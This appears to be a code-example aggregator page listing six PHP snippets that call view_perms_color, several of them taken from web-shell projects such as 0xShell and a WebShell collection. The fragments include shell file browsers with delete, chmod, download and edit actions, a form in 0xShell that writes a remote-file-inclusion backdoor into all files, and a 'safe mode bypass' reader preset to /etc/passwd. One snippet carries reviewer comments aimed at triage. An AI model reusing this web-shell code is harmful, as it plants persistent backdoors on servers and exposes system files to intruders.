コード例 #1
         echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b><u>" . $t[0] . "</u></b></a>";
     } else {
         echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b>" . $t[0] . "</b></a>";
     }
     echo " (<a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&white=1&d=" . urlencode($d) . "\" target=\"_blank\">+</a>) |";
 }
 echo "<hr size=\"1\" noshade>";
 if ($ft == "info") {
     echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> " . $d . $f . "</td></tr><tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr><tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>";
     if (!$win) {
         echo "<tr><td><b>Owner/Group</b></td><td> ";
         $ow = posix_getpwuid(fileowner($d . $f));
         $gr = posix_getgrgid(filegroup($d . $f));
         echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f));
     }
     echo "<tr><td><b>Perms</b></td><td><a href=\"" . $surl . "act=chmod&f=" . urlencode($f) . "&d=" . urlencode($d) . "\">" . view_perms_color($d . $f) . "</a></td></tr><tr><td><b>Create time</b></td><td> " . date("d/m/Y H:i:s", filectime($d . $f)) . "</td></tr><tr><td><b>Access time</b></td><td> " . date("d/m/Y H:i:s", fileatime($d . $f)) . "</td></tr><tr><td><b>MODIFY time</b></td><td> " . date("d/m/Y H:i:s", filemtime($d . $f)) . "</td></tr></table><br>";
     $fi = fopen($d . $f, "rb");
     if ($fi) {
         if ($fullhexdump) {
             echo "<b>FULL HEXDUMP</b>";
             $str = fread($fi, filesize($d . $f));
         } else {
             echo "<b>HEXDUMP PREVIEW</b>";
             $str = fread($fi, $hexdump_lines * $hexdump_rows);
         }
         $n = 0;
         $a0 = "00000000<br>";
         $a1 = "";
         $a2 = "";
         for ($i = 0; $i < strlen($str); $i++) {
             $a1 .= sprintf("%02X", ord($str[$i])) . " ";
コード例 #2
ファイル: xpanel.php プロジェクト: laiello/rapidleech36b
if (!is_readable(FILECONFIG) or is_dir(FILECONFIG) || !is_readable(FILEACCOUNT) or is_dir(FILEACCOUNT)) {
    foreach ($settingfile as $file) {
        if (file_exists($file)) {
            $buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($file) . ")!</b>";
        } else {
            $buffer_TEXT .= '<b>' . $file . ' does not exists.</b><br />';
        }
    }
    unset($file);
} else {
    $close_config_page = false;
    $styledisplay = ' style="display:none;"';
    $showpostn = false;
    $iserr = false;
    foreach ($settingfile as $file) {
        $buffer_TEXT .= "<b>File:&nbsp;&nbsp;&nbsp;&nbsp;" . basename($file) . " (" . view_size(filesize($file)) . ") &nbsp; &nbsp; &nbsp; attrib: &nbsp; &nbsp; " . view_perms_color($file) . "</b><br />";
    }
    unset($file);
    $buffer_TEXT .= "You're&nbsp;logged&nbsp;with&nbsp;IP:&nbsp;<b class='g'>" . $visitors->userip . "</b><br /><hr width='800%' />";
    if (isset($_POST['submit']) && $_POST['setupsave'] == 1) {
        #============= WRITE CONFIG ================
        # Final filter to write config
        # Filter level 2; check strict value; raise error if value not valid
        if ($task == 'editor') {
            $edt = $_POST['edit_text'];
            $sfile = $_POST['file'];
            if (!write_file($sfile, $edt, 1)) {
                $buffer_TEXT .= "<b class='a'>Can't write to file!</b>";
            } else {
                $buffer_TEXT .= "<b style='color:#00FF33'>Saved!</b>";
                //				$r = $edt;
コード例 #3
ファイル: 12309.php プロジェクト: wucaishi/WebShell-1
/**
 * Echoes an HTML table listing one directory, with per-entry action links.
 *
 * The page attributes this file to a web-shell collection; this function is
 * its file-browser view. Traits a reviewer can key on when triaging a
 * suspicious PHP file: a directory enumerated from a caller-supplied path,
 * rows that carry delete/chmod/touch/download/edit actions for every entry,
 * and an error string that mentions open_basedir/safe_mode.
 *
 * Depends on names not defined in this block: view_size(), dirsize(), owner()
 * and view_perms_color(), plus two HTML forms named "reqs" and "editor" that
 * the generated onclick handlers fill in and submit.
 *
 * Nothing is returned; all output goes through echo (or die() on failure).
 *
 * @param string $dir Directory to list; an empty value means the current
 *                    working directory. NOTE(review): presumably taken from
 *                    the request - confirm at the call site.
 */
function scandire($dir)
{
    if (empty($dir)) {
        $dir = getcwd();
    }
    // "=" binds tighter than "or", so $dir receives chdir()'s boolean result and
    // die() runs only when chdir() fails. $pageend is not declared in this
    // function's scope, so it adds nothing to the message.
    $dir = chdir($dir) or die('<font color="red">cannot chdir!</font> open_basedir/safe_mode on?<br><br>' . $pageend . '');
    // Re-read the directory after the chdir() and normalise it to forward
    // slashes with a trailing "/".
    $dir = getcwd() . "/";
    $dir = str_replace("\\", "/", $dir);
    if (is_dir($dir)) {
        if ($dh = opendir($dir)) {
            // Sort entries into two lists by filetype(): "dir" goes to $dire;
            // "file", "link" and "socket" go to $files. Any other type is not
            // listed. "." and ".." are not filtered out.
            while (($file = readdir($dh)) !== false) {
                if (filetype($dir . $file) == "dir") {
                    $dire[] = $file;
                }
                if (filetype($dir . $file) == "file" || filetype($dir . $file) == "link" || filetype($dir . $file) == "socket") {
                    $files[] = $file;
                }
                // if(filetype($dir.$file)=="") $files[]=$file; //debug: strange behavior of filetype() with openbasedir, it returns ""
                // if(filetype($dir.$file)=="link") $files[]=$file;
                // echo "file = ".$file." (".filetype($file).")<br>"; #debug
                // if (is_link($file)) { echo " -&gt ".readlink($file); }; #debug
            }
            closedir($dh);
            // NOTE(review): $dire and $files are never initialised, so either is
            // undefined when the directory holds no entry of that kind; the "@"
            // only hides the resulting diagnostic from sort().
            @sort($dire);
            @sort($files);
            echo "<table border>";
            // "Go to dir" form: posts p=f, action=viewer and the typed path back to
            // this script. $_SERVER['PHP_SELF'] and $dir are written into the
            // attributes without htmlspecialchars().
            echo '<tr><td><form method="post" action="' . $_SERVER['PHP_SELF'] . '"><input name="p" type="hidden" value="f">go to dir:<input type="text" name="dir" value="' . $dir . '" size="30"><input name="action" type="hidden" value="viewer"><input type="submit" value="Go"></form></td></tr>';
            echo "<tr><td>Name</td><td>Type</td><td>Size</td><td>Inode Changed<br>File Modified<br>File Accessed</td><td>Owner<br>Group</td><td>Chmod</td><td>Action</td></tr>";
            // One row per directory: the name link submits form "reqs" with
            // action=viewer; the action column submits deletedir / chmod / touch.
            // Paths are concatenated into the inline JavaScript unescaped, so a
            // name containing a quote breaks the handler. The name link is closed
            // with "<a/>" rather than "</a>".
            for ($i = 0; $i < count($dire); $i++) {
                $link = $dir . $dire[$i];
                echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . '<a/></td><td>Dir</td><td>' . view_size(dirsize($link)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($link)) . '<br>' . date("d/m/Y H:i:s", filemtime($link)) . '<br>' . date("d/m/Y H:i:s", fileatime($link)) . '</font></td><td>' . owner($link) . '</td><td>' . substr(sprintf('%o', fileperms($link)), -4) . ' <br>(' . view_perms_color($link, "string") . ')</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.dir.value=\'' . $dir . '\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Touch">T</a></td></tr>';
            }
            // One row per file: the name link and "E" submit form "editor"; "D",
            // "x", "C" and "T" submit form "reqs" with action download / delete /
            // chmod / touch. The row ends with a doubled "</tr></tr>".
            for ($i = 0; $i < count($files); $i++) {
                $linkfile = $dir . $files[$i];
                echo '<tr><td><a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();">' . $files[$i] . '</a>';
                echo '<br></td><td>File</td><td>' . view_size(filesize($linkfile)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($linkfile)) . '<br>' . date("d/m/Y H:i:s", filemtime($linkfile)) . '<br>' . date("d/m/Y H:i:s", fileatime($linkfile)) . '</font></td><td>' . owner($linkfile) . '</td><td>' . substr(sprintf('%o', fileperms($linkfile)), -4) . ' <br>(' . view_perms_color($linkfile, "string") . ')</td><td> <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();" title="Download">D</a> <a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();" title="Edit">E</a> <a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Touch">T</a></td></tr></tr>';
            }
            echo "</table>";
        }
    }
}
コード例 #4
         echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='" . urlencode($f) . "';document.todo.ft.value='" . $t[1] . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\"><b><u>" . $t[0] . "</u></b></a>";
     } else {
         echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='" . urlencode($f) . "';document.todo.ft.value='" . $t[1] . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\"><b>" . $t[0] . "</b></a>";
     }
     echo " |";
 }
 echo "<hr size=\"1\" noshade>";
 if ($ft == "info") {
     echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> " . $d . $f . "</td></tr><tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr><tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>";
     if (!$win) {
         echo "<tr><td><b>Owner/Group</b></td><td> ";
         $ow = posix_getpwuid(fileowner($d . $f));
         $gr = posix_getgrgid(filegroup($d . $f));
         echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f));
     }
     echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.f.value='" . urlencode($f) . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\">" . view_perms_color($d . $f) . "</a></td></tr><tr><td><b>Create time</b></td><td> " . date("d/m/Y H:i:s", filectime($d . $f)) . "</td></tr><tr><td><b>Access time</b></td><td> " . date("d/m/Y H:i:s", fileatime($d . $f)) . "</td></tr><tr><td><b>MODIFY time</b></td><td> " . date("d/m/Y H:i:s", filemtime($d . $f)) . "</td></tr></table><br>";
     $fi = fopen($d . $f, "rb");
     if ($fi) {
         if ($fullhexdump) {
             echo "<b>FULL HEXDUMP</b>";
             $str = fread($fi, filesize($d . $f));
         } else {
             echo "<b>HEXDUMP PREVIEW</b>";
             $str = fread($fi, $hexdump_lines * $hexdump_rows);
         }
         $n = 0;
         $a0 = "00000000<br>";
         $a1 = "";
         $a2 = "";
         for ($i = 0; $i < strlen($str); $i++) {
             $a1 .= sprintf("%02X", ord($str[$i])) . " ";
コード例 #5
ファイル: 0xShell.php プロジェクト: KinG-InFeT/0xShell
            print "<form method='post' action='" . $patch . "?action=infect_all_file'>\n" . "<textarea name='cod3inf' cols=50 rows=4>\n" . "<?php include(\$GET['0xShell_RFI']); ?>\n" . "</textarea>\n" . "<br /><input type='submit' value='Infect All Files!' name='inf3ct'><br />\n";
        }
        break;
    case 'safe_mode_bypass':
        print "<form action='" . $patch . "?action=safe_mode_bypass' method='POST'>\n" . "File Name: <input type='text' name='filew' value='/etc/passwd'><br />\n" . "<input type='submit' value='Read File' name='red_file'>\n" . "</form>\n";
        if (isset($_POST['red_file'])) {
            if (empty($_POST['filew'])) {
                die("[ERROR] Enter the name file.");
            } else {
                safe_mode_bypass($_POST['filew']);
            }
        }
        break;
    case 'chmod':
        $perms = parse_perms(fileperms($_GET['file']));
        print "<form action=\"" . $patch . "?action=chmod&file=" . htmlspecialchars($_GET['file']) . "\" method=\"POST\">\n\t\t\t\t<h3 align=\"center\">Chmod File: <i>" . htmlspecialchars($_GET['file']) . " - (" . view_perms_color($_GET['file']) . ")</i></h3><br />\n\t\t\t\t<table align=center width=300 border=0 cellspacing=0 cellpadding=5>\n\t\t\t\t<tr><td><b>Owner</b><br><br>\n\t\t\t\t    <input type=checkbox NAME='chmod_o_r' value=1" . ($perms["o"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox name='chmod_o_w' value=1" . ($perms["o"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_o_x' value=1" . ($perms["o"]["x"] ? " checked" : "") . ">eXecute</td>\n\t\t\t\t<td><b>Group</b><br><br>\t\t\t\t\n\t\t\t\t    <input type=checkbox NAME='chmod_g_r' value=1" . ($perms["g"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox NAME='chmod_g_w' value=1" . ($perms["g"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_g_x' value=1" . ($perms["g"]["x"] ? " checked" : "") . ">eXecute\n\t\t\t\t</font></td>\t\t\t\t\n\t\t\t\t<td><b>World</b><br><br>\n\t\t\t\t    <input type=checkbox NAME='chmod_w_r' value=1" . ($perms["w"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox NAME='chmod_w_w' value=1" . ($perms["w"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_w_x' value=1" . ($perms["w"]["x"] ? " checked" : "") . ">eXecute\n\t\t\t\t</font></td></tr><tr><td>\n\t\t\t\t<input type='submit' name='chmod_edit' value='Save'>\n\t\t\t\t</td></tr>\n\t\t\t\t</table>\n\t\t\t\t</form>";
        if (isset($_POST['chmod_edit'])) {
            $perms_final = "0" . base_convert((@$_POST['chmod_o_r'] ? 1 : 0) . (@$_POST['chmod_o_w'] ? 1 : 0) . (@$_POST['chmod_o_x'] ? 1 : 0) . (@$_POST['chmod_g_r'] ? 1 : 0) . (@$_POST['chmod_g_w'] ? 1 : 0) . (@$_POST['chmod_g_x'] ? 1 : 0) . (@$_POST['chmod_w_r'] ? 1 : 0) . (@$_POST['chmod_w_w'] ? 1 : 0) . (@$_POST['chmod_w_x'] ? 1 : 0), 2, 8);
            print chmod_shell($_GET['file'], $perms_final);
        }
        break;
}
if (isset($remove_file)) {
    //Rimozione file
    if (!is_writable($remove_file)) {
        die("File Not Deleted");
    }
    if (unlink($remove_file)) {
        print "<script>alert('File Deleted'); location.href='" . $patch . "';</script>";
    } else {
        print "<script>alert('File Not Deleted'); location.href='" . $patch . "';</script>";
コード例 #6
    }
}
// === MAIN
$buffer_TEXT = '';
if (!is_readable($fileconfig) or is_dir($fileconfig)) {
    if (file_exists($fileconfig)) {
        $buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($fileconfig) . ")!</b>";
    } else {
        $buffer_TEXT .= "<b>File does not exists.</b>";
    }
} else {
    $styledisplay = ' style="display:none"';
    $showpostn = false;
    $iserr = false;
    $t_head = "<b>File:&nbsp;&nbsp;&nbsp;&nbsp;" . CONFIG_FILE . " (" . view_size(filesize($fileconfig));
    $t_head .= ") &nbsp; &nbsp; &nbsp; attrib: &nbsp; &nbsp; " . view_perms_color($fileconfig) . "</b>";
    $t_head .= "<br>You're&nbsp;logged&nbsp;with&nbsp;IP:&nbsp;<b class='g'>" . get_real_ip() . "</b><br><hr width=\"800\">";
    $buffer_TEXT .= $t_head;
    if (isset($_GET["mode"])) {
        if ($_GET["mode"] == "editor") {
            $buffer_TEXT .= "<p><b><span id='nv1' style='background-color:#840000;color:yellow;'>&nbsp;Editor&nbsp;</span></p>";
        }
    }
    if (isset($_POST['submit'])) {
        if ($task == 'editor') {
            $edt = $_POST["edit_text"];
            $fp = fopen($fileconfig, "w");
            if (!$fp) {
                $buffer_TEXT .= "<b class='a'>Can't write to file!</b>";
            } else {
                fwrite($fp, $edt);